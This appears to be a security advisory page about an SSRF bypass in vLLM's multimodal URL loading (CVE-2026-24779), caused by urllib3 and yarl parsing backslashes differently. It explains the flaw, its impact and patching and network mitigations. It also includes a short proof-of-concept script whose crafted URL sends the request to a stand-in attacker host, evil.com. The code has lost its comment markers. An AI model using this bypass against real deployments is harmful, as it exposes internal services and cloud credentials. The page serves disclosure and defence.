vLLM, SSRF Bypass, CVE-2026-24779 (High)

Listen to this Post

The SSRF protection fix for GHSA-qh4c-xf7m-gxfc can be bypassed in the `load_from_url_async` method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client . The vulnerability exists in the MediaConnector class within the vLLM project’s multimodal feature set . The root cause is the use of `urllib3.util.parse_url()` for validation and `yarl` (via aiohttp) for the actual request, which handle backslash characters (\) differently . `urllib3.parse_url()` URL-encodes the backslash as %5C, treating `\@evil.com/` as part of the path, leaving the host as httpbin.org. Conversely, `yarl` interprets `httpbin.org\` as the userinfo component, with `@` acting as the separator, parsing the host as `evil.com` . An attacker can supply a URL like https://httpbin.org\@evil.com/` which passes validation against an allowlist but is interpreted by the HTTP client as a request toevil.com, allowing a full SSRF bypass .
<h2 style="color: blue;">dailycve form:</h2>
Platform: vLLM
Version: <0.14.1
Vulnerability: SSRF Bypass
Severity: High
date: 2026-01-27
<h2 style="color: blue;">Prediction: 2026-01-28</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>
This vulnerability (CVE-2026-24779) has a CVSS base score of 7.1 (High) with the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L . The attack complexity is low, requires low privileges, and needs no user interaction, making it easily exploitable over the network . It impacts confidentiality highly but has no direct impact on integrity and low impact on availability . The vulnerability is a bypass of a previous SSRF fix (GHSA-qh4c-xf7m-gxfc) and is related to CWE-918 (Server-Side Request Forgery) .
<h2 style="color: blue;">Exploit:</h2>

import aiohttp
import asyncio
from urllib3.util import parse_url
async def exploit():
Malicious URL that exploits the parsing discrepancy
malicious_url = "https://httpbin.org\\@evil.com/"
Validation layer (urllib3) - this passes the check
parsed = parse_url(malicious_url)
print(f"Validation host: {parsed.host}") Output: httpbin.org
Actual request layer (aiohttp with yarl) - this goes to evil.com
async with aiohttp.ClientSession() as session:
async with session.get(malicious_url) as response:
print(f"Request sent to: {response.url}") Output: https://evil.com/
print(f"Response status: {response.status}")
asyncio.run(exploit())

<h2 style="color: blue;">Protection from this CVE:</h2>
- Immediate Patch: Upgrade to vLLM version 0.14.1 or later .
- Network-Level Mitigation: Implement Kubernetes NetworkPolicy to restrict egress traffic, blocking access to private IP ranges :

kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: vllm-egress-restrict
spec:
podSelector:
matchLabels:
app: vllm
policyTypes:
- Egress
egress:
- to:
- ipBlock:
cidr: 0.0.0.0/0
except:
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.169.254/32
EOF

- Application-Level Validation: Implement a strict domain allowlist and resolve hostnames to IPs, blocking requests to private IP ranges :

from urllib.parse import urlparse
import socket
from ipaddress import ip_address, ip_network
PRIVATE_IP_RANGES = [ip_network(r) for r in ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"]]
def validate_url(url, allowed_domains):
url_spec = urlparse(url)
hostname = url_spec.hostname
if allowed_domains and hostname not in allowed_domains:
raise ValueError(f"Domain {hostname} not allowed")
ip = ip_address(socket.gethostbyname(hostname))
if any(ip in network for network in PRIVATE_IP_RANGES):
raise ValueError(f"Access to private IP {ip} forbidden")

<h2 style="color: blue;">Impact:</h2>
Successful exploitation allows an attacker to perform full Server-Side Request Forgery (SSRF) attacks . This can lead to internal network scanning, accessing sensitive data from internal services (e.g., cloud metadata endpoints), and in containerized environments like
llm-d`, it could allow a compromised vLLM pod to interact with other internal pods and management endpoints, potentially causing denial of service or system instability . The confidentiality impact is high, as internal resources can be exposed .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top